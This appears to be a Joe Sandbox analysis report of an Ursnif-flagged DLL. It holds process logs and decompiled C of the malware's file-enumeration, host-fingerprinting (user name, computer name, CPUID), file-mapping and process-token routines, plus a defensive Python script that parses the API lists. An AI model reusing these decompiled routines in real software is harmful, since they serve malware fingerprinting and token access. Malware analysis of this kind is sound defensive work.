                                                MD5 hash:071277CC2E3DF41EEEA8013E2AB58D5A
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language

                                                General

                                                Start time:11:28:56
                                                Start date:10/09/2021
                                                Path:C:\Windows\SysWOW64\rundll32.exe
                                                Wow64 process (32bit):true
                                                Commandline:rundll32.exe C:\Users\user\Desktop\qT9Qk5aKTk.dll,Americanistic
                                                Imagebase:0xef0000
                                                File size:61952 bytes
                                                MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000021.00000002.385594405.0000000000400000.00000040.00000001.sdmp, Author: Joe Security

                                                General

                                                Start time:11:29:00
                                                Start date:10/09/2021
                                                Path:C:\Windows\SysWOW64\rundll32.exe
                                                Wow64 process (32bit):true
                                                Commandline:rundll32.exe C:\Users\user\Desktop\qT9Qk5aKTk.dll,Suprahumanity
                                                Imagebase:0xef0000
                                                File size:61952 bytes
                                                MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000022.00000002.395181120.0000000000EC0000.00000040.00000001.sdmp, Author: Joe Security

                                                General

                                                Start time:11:29:03
                                                Start date:10/09/2021
                                                Path:C:\Windows\SysWOW64\rundll32.exe
                                                Wow64 process (32bit):true
                                                Commandline:rundll32.exe C:\Users\user\Desktop\qT9Qk5aKTk.dll,Eupyrchroite
                                                Imagebase:0xef0000
                                                File size:61952 bytes
                                                MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000023.00000002.404550110.00000000030F0000.00000040.00000001.sdmp, Author: Joe Security

                                                Disassembly

                                                Code Analysis

                                                  Executed Functions

                                                  Control-flow Graph

                                                  C-Code - Quality: 93%
                                                  			E00EC12D4(signed char* __eax, intOrPtr* _a4) {
                                                  				signed int _v12;
                                                  				void* _v16;
                                                  				CHAR* _v20;
                                                  				struct _FILETIME _v28;
                                                  				void* _v32;
                                                  				void* _v36;
                                                  				char* _v40;
                                                  				signed int _v44;
                                                  				long _v344;
                                                  				struct _WIN32_FIND_DATAA _v368;
                                                  				signed int _t72;
                                                  				void* _t74;
                                                  				signed int _t76;
                                                  				void* _t78;
                                                  				intOrPtr _t81;
                                                  				CHAR* _t83;
                                                  				void* _t85;
                                                  				signed char _t89;
                                                  				signed char _t91;
                                                  				intOrPtr _t93;
                                                  				void* _t96;
                                                  				long _t99;
                                                  				int _t101;
                                                  				signed int _t109;
                                                  				char* _t111;
                                                  				void* _t113;
                                                  				int _t119;
                                                  				char _t128;
                                                  				void* _t134;
                                                  				signed int _t136;
                                                  				char* _t139;
                                                  				signed int _t140;
                                                  				char* _t141;
                                                  				char* _t146;
                                                  				signed char* _t148;
                                                  				int _t151;
                                                  				void* _t152;
                                                  				void* _t153;
                                                  				void* _t154;
                                                  				void* _t165;
                                                  
                                                  				_v12 = _v12 & 0x00000000;
                                                  				_t148 = __eax;
                                                  				_t72 =  *0xecd278; // 0x63699bc3
                                                  				_t74 = RtlAllocateHeap( *0xecd238, 0, _t72 ^ 0x63699ac7);
                                                  				_v20 = _t74;
                                                  				if(_t74 == 0) {
                                                  					L36:
                                                  					return _v12;
                                                  				}
                                                  				_t76 =  *0xecd278; // 0x63699bc3
                                                  				_t78 = RtlAllocateHeap( *0xecd238, 0, _t76 ^ 0x63699bce);
                                                  				_t146 = 0;
                                                  				_v36 = _t78;
                                                  				if(_t78 == 0) {
                                                  					L35:
                                                  					HeapFree( *0xecd238, _t146, _v20);
                                                  					goto L36;
                                                  				}
                                                  				_t136 =  *0xecd278; // 0x63699bc3
                                                  				memset(_t78, 0, _t136 ^ 0x63699bce);
                                                  				_t81 =  *0xecd27c; // 0x213a5a8
                                                  				_t154 = _t153 + 0xc;
                                                  				_t5 = _t81 + 0xece7f2; // 0x73797325
                                                  				_t83 = E00EC95B1(_t5);
                                                  				_v20 = _t83;
                                                  				if(_t83 == 0) {
                                                  					L34:
                                                  					HeapFree( *0xecd238, _t146, _v36);
                                                  					goto L35;
                                                  				}
                                                  				_t134 = 0xffffffffffffffff;
                                                  				_v28.dwLowDateTime = 0x63699bce;
                                                  				_v28.dwHighDateTime = 0x63699bce;
                                                  				_t85 = CreateFileA(_t83, 0x80000000, 1, 0, 3, 0x80, 0); // executed
                                                  				_v32 = _t85;
                                                  				if(_t85 != 0x63699bce) {
                                                  					GetFileTime(_t85,  &_v28, 0, 0);
                                                  					_v28.dwLowDateTime = _v28.dwLowDateTime + 0x2a69c000;
                                                  					asm("adc dword [ebp-0x14], 0xc9"); // executed
                                                  					FindCloseChangeNotification(_v32); // executed
                                                  				}
                                                  				 *(StrRChrA(_v20, _t146, 0x5c)) = 0;
                                                  				_t89 = 0x3c6ef35f +  *_t148 * 0x19660d;
                                                  				_t91 = 0x3c6ef35f + _t89 * 0x19660d;
                                                  				 *_t148 = _t91;
                                                  				_v32 = _t91 & 0x000000ff;
                                                  				_t93 =  *0xecd27c; // 0x213a5a8
                                                  				_t16 = _t93 + 0xece813; // 0x642e2a5c
                                                  				_v40 = _t146;
                                                  				_v44 = _t89 & 0x000000ff;
                                                  				__imp__(_v20, _t16);
                                                  				_t96 = FindFirstFileA(_v20,  &_v368); // executed
                                                  				_v16 = _t96;
                                                  				if(_t96 == _t134) {
                                                  					_t146 = 0;
                                                  					goto L34;
                                                  				}
                                                  				_t99 = CompareFileTime( &(_v368.ftLastWriteTime),  &_v28);
                                                  				while(_t99 > 0) {
                                                  					_t101 = FindNextFileA(_v16,  &_v368); // executed
                                                  					if(_t101 == 0) {
                                                  						FindClose(_v16);
                                                  						_v16 = FindFirstFileA(_v20,  &_v368);
                                                  						_v28.dwHighDateTime = _v344;
                                                  						_v28.dwLowDateTime = _v368.ftLastWriteTime.dwLowDateTime;
                                                  					}
                                                  					_t99 = CompareFileTime( &(_v368.ftLastWriteTime),  &_v28);
                                                  				}
                                                  				_v12 = _v12 & 0x00000000;
                                                  				while(1) {
                                                  					_t109 = _v44;
                                                  					if(_v12 <= _t109) {
                                                  						goto L15;
                                                  					}
                                                  					_t140 = _v12;
                                                  					if(_t140 > _v32) {
                                                  						_t141 = _v36;
                                                  						 *_a4 = _t141;
                                                  						while(1) {
                                                  							_t128 =  *_t141;
                                                  							if(_t128 == 0) {
                                                  								break;
                                                  							}
                                                  							if(_t128 < 0x30) {
                                                  								 *_t141 = _t128 + 0x20;
                                                  							}
                                                  							_t141 = _t141 + 1;
                                                  						}
                                                  						_v12 = 1;
                                                  						FindClose(_v16); // executed
                                                  						_t146 = 0;
                                                  						goto L35;
                                                  					}
                                                  					_t165 = _t140 - _t109;
                                                  					L15:
                                                  					if(_t165 == 0 || _v12 == _v32) {
                                                  						_t111 = StrChrA( &(_v368.cFileName), 0x2e);
                                                  						_t139 = _v40;
                                                  						_t151 = _t111 -  &(_v368.cFileName);
                                                  						_t113 = 0;
                                                  						if(_t139 != 0) {
                                                  							_t48 = _t151 - 4; // -4
                                                  							_t113 = _t48;
                                                  							if(_t113 > _t151) {
                                                  								_t113 = 0;
                                                  							}
                                                  						}
                                                  						if(_t151 > 4) {
                                                  							_t151 = 4;
                                                  						}
                                                  						memcpy(_v36 + _t139, _t152 + _t113 - 0x140, _t151);
                                                  						_t154 = _t154 + 0xc;
                                                  						_v40 =  &(_v40[_t151]);
                                                  					}
                                                  					do {
                                                  						_t119 = FindNextFileA(_v16,  &_v368); // executed
                                                  						if(_t119 == 0) {
                                                  							FindClose(_v16);
                                                  							_v16 = FindFirstFileA(_v20,  &_v368);
                                                  						}
                                                  					} while (CompareFileTime( &(_v368.ftLastWriteTime),  &_v28) > 0);
                                                  					_v12 = _v12 + 1;
                                                  				}
                                                  			}

                                                  APIs
                                                  • RtlAllocateHeap.NTDLL(00000000,63699BC3,00000000), ref: 00EC12FF
                                                  • RtlAllocateHeap.NTDLL(00000000,63699BC3), ref: 00EC1321
                                                  • memset.NTDLL ref: 00EC133B
                                                    • Part of subcall function 00EC95B1: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,?,63699BCE,00EC1354,73797325), ref: 00EC95C2
                                                    • Part of subcall function 00EC95B1: ExpandEnvironmentStringsA.KERNEL32(?,00000000,00000000,00000000), ref: 00EC95DC
                                                  • CreateFileA.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000080,00000000,73797325), ref: 00EC1379
                                                  • GetFileTime.KERNEL32(00000000,?,00000000,00000000), ref: 00EC138D
                                                  • FindCloseChangeNotification.KERNELBASE(00000000), ref: 00EC13A4
                                                  • StrRChrA.SHLWAPI(?,00000000,0000005C), ref: 00EC13B0
                                                  • lstrcat.KERNEL32(?,642E2A5C), ref: 00EC13F1
                                                  • FindFirstFileA.KERNELBASE(?,?), ref: 00EC1407
                                                  • CompareFileTime.KERNEL32(?,?), ref: 00EC1425
                                                  • FindNextFileA.KERNELBASE(00EC96C1,?), ref: 00EC1439
                                                  • FindClose.KERNEL32(00EC96C1), ref: 00EC1446
                                                  • FindFirstFileA.KERNEL32(?,?), ref: 00EC1452
                                                  • CompareFileTime.KERNEL32(?,?), ref: 00EC1474
                                                  • StrChrA.SHLWAPI(?,0000002E), ref: 00EC14A7
                                                  • memcpy.NTDLL(00000000,?,00000000), ref: 00EC14E0
                                                  • FindNextFileA.KERNELBASE(00EC96C1,?), ref: 00EC14F5
                                                  • FindClose.KERNEL32(00EC96C1), ref: 00EC1502
                                                  • FindFirstFileA.KERNEL32(?,?), ref: 00EC150E
                                                  • CompareFileTime.KERNEL32(?,?), ref: 00EC151E
                                                  • FindClose.KERNELBASE(00EC96C1), ref: 00EC1553
                                                  • HeapFree.KERNEL32(00000000,00000000,73797325), ref: 00EC1565
                                                  • HeapFree.KERNEL32(00000000,?), ref: 00EC1575
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.647362848.0000000000EC1000.00000020.00020000.sdmp, Offset: 00EC0000, based on PE: true
                                                  • Associated: 00000000.00000002.647333760.0000000000EC0000.00000004.00020000.sdmp
                                                  • Associated: 00000000.00000002.647432081.0000000000ECC000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.647480156.0000000000ECD000.00000004.00020000.sdmp
                                                  • Associated: 00000000.00000002.647542838.0000000000ECF000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_ec0000_loaddll32.jbxd
                                                  Similarity
                                                  • API ID: File$Find$CloseHeapTime$CompareFirst$AllocateEnvironmentExpandFreeNextStrings$ChangeCreateNotificationlstrcatmemcpymemset
                                                  • String ID:
                                                  • API String ID: 2944988578-0
                                                  • Opcode ID: 86020d38247b3eede46f11e52663ef8372f60f1d1455e35f56aebffa9a892285
                                                  • Instruction ID: 7cf96fd3436e481602c6a71fca079c5dc2e01b08ac251e8f60d686f153b84451
                                                  • Opcode Fuzzy Hash: 86020d38247b3eede46f11e52663ef8372f60f1d1455e35f56aebffa9a892285
                                                  • Instruction Fuzzy Hash: 92814871D00109EFDB10DFA5DC45EEEBBB9FB45304F1041AAE515F6261D7329A468B60
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 204 40102f-401086 GetSystemTimeAsFileTime _aulldiv _snwprintf 205 401088 204->205 206 40108d-4010a6 CreateFileMappingW 204->206 205->206 207 4010f0-4010f6 GetLastError 206->207 208 4010a8-4010b1 206->208 211 4010f8-4010fe 207->211 209 4010c1-4010cf MapViewOfFile 208->209 210 4010b3-4010ba GetLastError 208->210 213 4010d1-4010dd 209->213 214 4010df-4010e5 GetLastError 209->214 210->209 212 4010bc-4010bf 210->212 215 4010e7-4010ee CloseHandle 212->215 213->211 214->211 214->215 215->211
                                                  C-Code - Quality: 69%
                                                  			E0040102F(intOrPtr __edx, long _a4, void** _a8, void** _a12) {
                                                  				intOrPtr _v12;
                                                  				struct _FILETIME* _v16;
                                                  				short _v60;
                                                  				struct _FILETIME* _t14;
                                                  				intOrPtr _t15;
                                                  				long _t18;
                                                  				void* _t19;
                                                  				void* _t22;
                                                  				intOrPtr _t31;
                                                  				long _t32;
                                                  				void* _t34;
                                                  
                                                  				_t31 = __edx;
                                                  				_t14 =  &_v16;
                                                  				GetSystemTimeAsFileTime(_t14);
                                                  				_push(0x192);
                                                  				_push(0x54d38000);
                                                  				_push(_v12);
                                                  				_push(_v16);
                                                  				L00402100();
                                                  				_push(_t14);
                                                  				_v16 = _t14;
                                                  				_t15 =  *0x404150;
                                                  				_push(_t15 + 0x40505e);
                                                  				_push(_t15 + 0x405054);
                                                  				_push(0x16);
                                                  				_push( &_v60);
                                                  				_v12 = _t31;
                                                  				L004020FA();
                                                  				_t18 = _a4;
                                                  				if(_t18 == 0) {
                                                  					_t18 = 0x1000;
                                                  				}
                                                  				_t19 = CreateFileMappingW(0xffffffff, 0x404140, 4, 0, _t18,  &_v60); // executed
                                                  				_t34 = _t19;
                                                  				if(_t34 == 0) {
                                                  					_t32 = GetLastError();
                                                  				} else {
                                                  					if(_a4 != 0 || GetLastError() == 0xb7) {
                                                  						_t22 = MapViewOfFile(_t34, 6, 0, 0, 0); // executed
                                                  						if(_t22 == 0) {
                                                  							_t32 = GetLastError();
                                                  							if(_t32 != 0) {
                                                  								goto L9;
                                                  							}
                                                  						} else {
                                                  							 *_a8 = _t34;
                                                  							 *_a12 = _t22;
                                                  							_t32 = 0;
                                                  						}
                                                  					} else {
                                                  						_t32 = 2;
                                                  						L9:
                                                  						CloseHandle(_t34);
                                                  					}
                                                  				}
                                                  				return _t32;
                                                  			}

                                                  APIs
                                                  • GetSystemTimeAsFileTime.KERNEL32(?), ref: 0040103C
                                                  • _aulldiv.NTDLL(?,?,54D38000,00000192), ref: 00401052
                                                  • _snwprintf.NTDLL ref: 00401077
                                                  • CreateFileMappingW.KERNELBASE(000000FF,00404140,00000004,00000000,?,?), ref: 0040109C
                                                  • GetLastError.KERNEL32 ref: 004010B3
                                                  • MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000), ref: 004010C7
                                                  • GetLastError.KERNEL32 ref: 004010DF
                                                  • CloseHandle.KERNEL32(00000000), ref: 004010E8
                                                  • GetLastError.KERNEL32 ref: 004010F0
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.644892830.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.644956841.0000000000405000.00000040.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ErrorFileLast$Time$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
                                                  • String ID:
                                                  • API String ID: 1724014008-0
                                                  • Opcode ID: 237bd4267b8507ef2e770013a7e9044532c0ed1270bd501eb3486a71b066fa40
                                                  • Instruction ID: 61cdcec85cecdffe8ab43489883bfa6cdd29d31204b6cddf744d864112287dc7
                                                  • Opcode Fuzzy Hash: 237bd4267b8507ef2e770013a7e9044532c0ed1270bd501eb3486a71b066fa40
                                                  • Instruction Fuzzy Hash: 1D21D3B2500148BFD710AFA8DC89EEE7BADEB48355F108036F615F72E0D67499858B68
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 225 ec269c-ec26b0 226 ec26ba-ec26cc call ec6b43 225->226 227 ec26b2-ec26b7 225->227 230 ec26ce-ec26de GetUserNameW 226->230 231 ec2720-ec272d 226->231 227->226 232 ec272f-ec2746 GetComputerNameW 230->232 233 ec26e0-ec26f0 RtlAllocateHeap 230->233 231->232 234 ec2748-ec2759 RtlAllocateHeap 232->234 235 ec2784-ec27a6 232->235 233->232 236 ec26f2-ec26ff GetUserNameW 233->236 234->235 237 ec275b-ec2764 GetComputerNameW 234->237 238 ec270f-ec271e HeapFree 236->238 239 ec2701-ec270d call ec2496 236->239 240 ec2775-ec277e HeapFree 237->240 241 ec2766-ec2772 call ec2496 237->241 238->232 239->238 240->235 241->240
                                                  C-Code - Quality: 96%
                                                  			E00EC269C(char __eax, signed int* __esi) {
                                                  				long _v8;
                                                  				char _v12;
                                                  				signed int _v16;
                                                  				signed int _v20;
                                                  				signed int _v28;
                                                  				long _t34;
                                                  				signed int _t39;
                                                  				long _t50;
                                                  				char _t59;
                                                  				intOrPtr _t61;
                                                  				void* _t62;
                                                  				void* _t63;
                                                  				signed int* _t64;
                                                  				char _t65;
                                                  				intOrPtr* _t67;
                                                  				void* _t68;
                                                  				signed int* _t69;
                                                  
                                                  				_t69 = __esi;
                                                  				_t65 = __eax;
                                                  				_v8 = 0;
                                                  				_v12 = __eax;
                                                  				if(__eax == 0) {
                                                  					_t59 =  *0xecd270; // 0xd448b889
                                                  					_v12 = _t59;
                                                  				}
                                                  				_t64 = _t69;
                                                  				E00EC6B43( &_v12, _t64);
                                                  				if(_t65 != 0) {
                                                  					 *_t69 =  *_t69 ^  *0xecd278 ^ 0x4c0ca0ae;
                                                  				} else {
                                                  					GetUserNameW(0,  &_v8); // executed
                                                  					_t50 = _v8;
                                                  					if(_t50 != 0) {
                                                  						_t62 = RtlAllocateHeap( *0xecd238, 0, _t50 + _t50);
                                                  						if(_t62 != 0) {
                                                  							if(GetUserNameW(_t62,  &_v8) != 0) {
                                                  								_t63 = _t62;
                                                  								 *_t69 =  *_t69 ^ E00EC2496(_v8 + _v8, _t63);
                                                  							}
                                                  							HeapFree( *0xecd238, 0, _t62);
                                                  						}
                                                  					}
                                                  				}
                                                  				_t61 = __imp__;
                                                  				_v8 = _v8 & 0x00000000;
                                                  				GetComputerNameW(0,  &_v8);
                                                  				_t34 = _v8;
                                                  				if(_t34 != 0) {
                                                  					_t68 = RtlAllocateHeap( *0xecd238, 0, _t34 + _t34);
                                                  					if(_t68 != 0) {
                                                  						if(GetComputerNameW(_t68,  &_v8) != 0) {
                                                  							_t63 = _t68;
                                                  							_t69[3] = _t69[3] ^ E00EC2496(_v8 + _v8, _t63);
                                                  						}
                                                  						HeapFree( *0xecd238, 0, _t68);
                                                  					}
                                                  				}
                                                  				asm("cpuid");
                                                  				_t67 =  &_v28;
                                                  				 *_t67 = 1;
                                                  				 *((intOrPtr*)(_t67 + 4)) = _t61;
                                                  				 *(_t67 + 8) = _t63;
                                                  				 *(_t67 + 0xc) = _t64;
                                                  				_t39 = _v16 ^ _v20 ^ _v28;
                                                  				_t69[1] = _t69[1] ^ _t39;
                                                  				return _t39;
			}

                                                  Instruction addresses of the C-code statements above, in listing order (the side-by-side address column was flattened during extraction): 0x00ec269c, 0x00ec26a4, 0x00ec26aa, 0x00ec26ad, 0x00ec26b0, 0x00ec26b2, 0x00ec26b7, 0x00ec26b7, 0x00ec26bd, 0x00ec26bf, 0x00ec26cc, 0x00ec272d, 0x00ec26ce, 0x00ec26d3, 0x00ec26d9, 0x00ec26de, 0x00ec26ec, 0x00ec26f0, 0x00ec26ff, 0x00ec2706, 0x00ec270d, 0x00ec270d, 0x00ec2718, 0x00ec2718, 0x00ec26f0, 0x00ec26de, 0x00ec272f, 0x00ec2735, 0x00ec273f, 0x00ec2741, 0x00ec2746, 0x00ec2755, 0x00ec2759, 0x00ec2764, 0x00ec276b, 0x00ec2772, 0x00ec2772, 0x00ec277e, 0x00ec277e, 0x00ec2759, 0x00ec2787, 0x00ec2789, 0x00ec278c, 0x00ec278e, 0x00ec2791, 0x00ec2794, 0x00ec279e, 0x00ec27a2, 0x00ec27a6

                                                  APIs
                                                  • GetUserNameW.ADVAPI32(00000000,?), ref: 00EC26D3
                                                  • RtlAllocateHeap.NTDLL(00000000,?), ref: 00EC26EA
                                                  • GetUserNameW.ADVAPI32(00000000,?), ref: 00EC26F7
                                                  • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,00EC23D9), ref: 00EC2718
                                                  • GetComputerNameW.KERNEL32(00000000,00000000), ref: 00EC273F
                                                  • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 00EC2753
                                                  • GetComputerNameW.KERNEL32(00000000,00000000), ref: 00EC2760
                                                  • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,00EC23D9), ref: 00EC277E
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.647362848.0000000000EC1000.00000020.00020000.sdmp, Offset: 00EC0000, based on PE: true
                                                  • Associated: 00000000.00000002.647333760.0000000000EC0000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.647432081.0000000000ECC000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.647480156.0000000000ECD000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.647542838.0000000000ECF000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_ec0000_loaddll32.jbxd
                                                  Similarity
                                                  • API ID: HeapName$AllocateComputerFreeUser
                                                  • String ID:
                                                  • API String ID: 3239747167-0
                                                  • Opcode ID: 9c21784f790459c31909cea3b88a4afbe94ef29d05c08aadae992bb23bdf1b3c
                                                  • Instruction ID: f3ec2899d10c0b2155c363b247bbe1b989e1a839f7a6a5a7e90355a6217c3914
                                                  • Opcode Fuzzy Hash: 9c21784f790459c31909cea3b88a4afbe94ef29d05c08aadae992bb23bdf1b3c
                                                  • Instruction Fuzzy Hash: 6031F571A00205EFDB15DF6ADD81FAEF7F9EB48314B214039E505E6220DB72EE469B10
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%
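The per-function "APIs" lists are the quickest thing to harvest from a listing like this for triage: they give the call-site order, the module, the visible arguments and the address of each call, and an ordered sequence (open process, open token, query token, copy) says more than the unordered names in the "API ID" line. The Python below parses those bullet lines into records and checks for an ordered API pattern. It is an added example written for this report, not Joe Sandbox code; the parsed input is constructed here by copying the API bullets of the token-query function that appears further down in this report, and the pattern it checks is a hand-written illustration, not a rule shipped with any tool.

```python
import re
from dataclasses import dataclass
from typing import List, Optional

# One "APIs" bullet of a Joe Sandbox function listing. Handles the three shapes
# seen in this report:
#   • GetUserNameW.ADVAPI32(00000000,?), ref: 00EC26D3
#   • Part of subcall function 00EC2049: RtlAllocateHeap.NTDLL(00000000), ref: 00EC2055
#   • memset.NTDLL ref: 00401F34
API_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-F]+):\s*)?"
    r"(?P<api>\w+)\.(?P<mod>\w+)"
    r"(?:\((?P<args>[^)]*)\))?"
    r"\s*,?\s*(?:ref:\s*(?P<ref>[0-9A-F]+))?\s*$",
    re.IGNORECASE,
)


@dataclass
class ApiCall:
    api: str
    module: str
    args: List[str]
    ref: Optional[int]          # call-site address, None when the line has none
    subcall_of: Optional[int]   # callee address when reported as "Part of subcall function"


def parse_api_lines(text: str) -> List[ApiCall]:
    """Parse every APIs bullet in text into ApiCall records, in listing order."""
    calls: List[ApiCall] = []
    for line in text.splitlines():
        m = API_LINE.match(line)
        if not m:
            continue
        args = [a.strip() for a in m["args"].split(",")] if m["args"] else []
        calls.append(ApiCall(
            api=m["api"],
            module=m["mod"].upper(),
            args=args,
            ref=int(m["ref"], 16) if m["ref"] else None,
            subcall_of=int(m["sub"], 16) if m["sub"] else None,
        ))
    return calls


def direct_sequence(calls: List[ApiCall]) -> List[str]:
    """API names the function calls itself, in call-site order (subcall lines dropped)."""
    return [c.api for c in calls if c.subcall_of is None]


def contains_ordered(seq: List[str], pattern: List[str]) -> bool:
    """True if pattern occurs in seq as an ordered, not necessarily contiguous, subsequence."""
    it = iter(seq)                      # 'in' on an iterator consumes it, so order is enforced
    return all(name in it for name in pattern)


# Constructed input: the APIs bullets copied from the token-query function in this report.
TOKEN_APIS = """\
• NtOpenProcess.NTDLL(00000000,00000400,?,?), ref: 00EC83FE
• NtOpenProcessToken.NTDLL(00000000,00000008,?), ref: 00EC8411
• NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000), ref: 00EC842D
  • Part of subcall function 00EC2049: RtlAllocateHeap.NTDLL(00000000,00000000,00EC7E50), ref: 00EC2055
• NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000), ref: 00EC844A
• memcpy.NTDLL(00000000,00000000,0000001C), ref: 00EC8457
• NtClose.NTDLL(?), ref: 00EC8469
• NtClose.NTDLL(00000000), ref: 00EC8473
"""

# Hand-written illustration of an ordered pattern: open a process, open its token,
# read token data, copy it out. The order is the point; the names alone are common.
TOKEN_READ_PATTERN = ["NtOpenProcess", "NtOpenProcessToken", "NtQueryInformationToken", "memcpy"]

if __name__ == "__main__":
    calls = parse_api_lines(TOKEN_APIS)
    for c in calls:
        print(f"{c.ref or 0:08X} {c.module}!{c.api}({', '.join(c.args)})")
    print(contains_ordered(direct_sequence(calls), TOKEN_READ_PATTERN))  # True
```

Subcall lines are kept as records (with `subcall_of` set) but excluded from the direct sequence, so a heap allocation inside a helper does not break an ordered match on the caller's own calls.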

                                                  Control-flow Graph

                                                  C-Code - Quality: 38%
                                                  			E00EC83B7(char _a4, void* _a8) {
                                                  				void* _v8;
                                                  				void* _v12;
                                                  				char _v16;
                                                  				void* _v20;
                                                  				char _v24;
                                                  				char _v28;
                                                  				char _v32;
                                                  				char _v36;
                                                  				char _v40;
                                                  				void* _v44;
                                                  				void** _t33;
                                                  				void* _t40;
                                                  				void* _t43;
                                                  				void** _t44;
                                                  				intOrPtr* _t47;
                                                  				char _t48;
                                                  
                                                  				asm("stosd");
                                                  				asm("stosd");
                                                  				asm("stosd");
                                                  				asm("stosd");
                                                  				asm("stosd");
                                                  				_v20 = _a4;
                                                  				_t48 = 0;
                                                  				_v16 = 0;
                                                  				_a4 = 0;
                                                  				_v44 = 0x18;
                                                  				_v40 = 0;
                                                  				_v32 = 0;
                                                  				_v36 = 0;
                                                  				_v28 = 0;
                                                  				_v24 = 0;
                                                  				if(NtOpenProcess( &_v12, 0x400,  &_v44,  &_v20) >= 0) {
                                                  					_t33 =  &_v8;
                                                  					__imp__(_v12, 8, _t33);
                                                  					if(_t33 >= 0) {
                                                  						_t47 = __imp__;
                                                  						 *_t47(_v8, 1, 0, 0,  &_a4, _t43); // executed
                                                  						_t44 = E00EC2049(_a4);
                                                  						if(_t44 != 0) {
                                                  							_t40 =  *_t47(_v8, 1, _t44, _a4,  &_a4); // executed
                                                  							if(_t40 >= 0) {
                                                  								memcpy(_a8,  *_t44, 0x1c);
                                                  								_t48 = 1;
                                                  							}
                                                  							E00EC9039(_t44);
                                                  						}
                                                  						NtClose(_v8); // executed
                                                  					}
                                                  					NtClose(_v12);
                                                  				}
                                                  				return _t48;
			}

                                                  Instruction addresses of the C-code statements above, in listing order (the side-by-side address column was flattened during extraction): 0x00ec83c4, 0x00ec83c5, 0x00ec83c6, 0x00ec83c7, 0x00ec83c8, 0x00ec83cc, 0x00ec83d3, 0x00ec83e2, 0x00ec83e5, 0x00ec83e8, 0x00ec83ef, 0x00ec83f2, 0x00ec83f5, 0x00ec83f8, 0x00ec83fb, 0x00ec8406, 0x00ec8408, 0x00ec8411, 0x00ec8419, 0x00ec841b, 0x00ec842d, 0x00ec8437, 0x00ec843b, 0x00ec844a, 0x00ec844e, 0x00ec8457, 0x00ec845f, 0x00ec845f, 0x00ec8461, 0x00ec8461, 0x00ec8469, 0x00ec846f, 0x00ec8473, 0x00ec8473, 0x00ec847e

                                                  APIs
                                                  • NtOpenProcess.NTDLL(00000000,00000400,?,?), ref: 00EC83FE
                                                  • NtOpenProcessToken.NTDLL(00000000,00000008,?), ref: 00EC8411
                                                  • NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000), ref: 00EC842D
                                                    • Part of subcall function 00EC2049: RtlAllocateHeap.NTDLL(00000000,00000000,00EC7E50), ref: 00EC2055
                                                  • NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000), ref: 00EC844A
                                                  • memcpy.NTDLL(00000000,00000000,0000001C), ref: 00EC8457
                                                  • NtClose.NTDLL(?), ref: 00EC8469
                                                  • NtClose.NTDLL(00000000), ref: 00EC8473
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.647362848.0000000000EC1000.00000020.00020000.sdmp, Offset: 00EC0000, based on PE: true
                                                  • Associated: 00000000.00000002.647333760.0000000000EC0000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.647432081.0000000000ECC000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.647480156.0000000000ECD000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.647542838.0000000000ECF000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_ec0000_loaddll32.jbxd
                                                  Similarity
                                                  • API ID: Token$CloseInformationOpenProcessQuery$AllocateHeapmemcpy
                                                  • String ID:
                                                  • API String ID: 2575439697-0
                                                  • Opcode ID: 7d22cd59952c87fd8f965b73cd38b86651b895e306c8930264e50d15ab1786ab
                                                  • Instruction ID: 67394f7f6d9c237824b85a632b77d219c34e71807007dff61909a45575634abd
                                                  • Opcode Fuzzy Hash: 7d22cd59952c87fd8f965b73cd38b86651b895e306c8930264e50d15ab1786ab
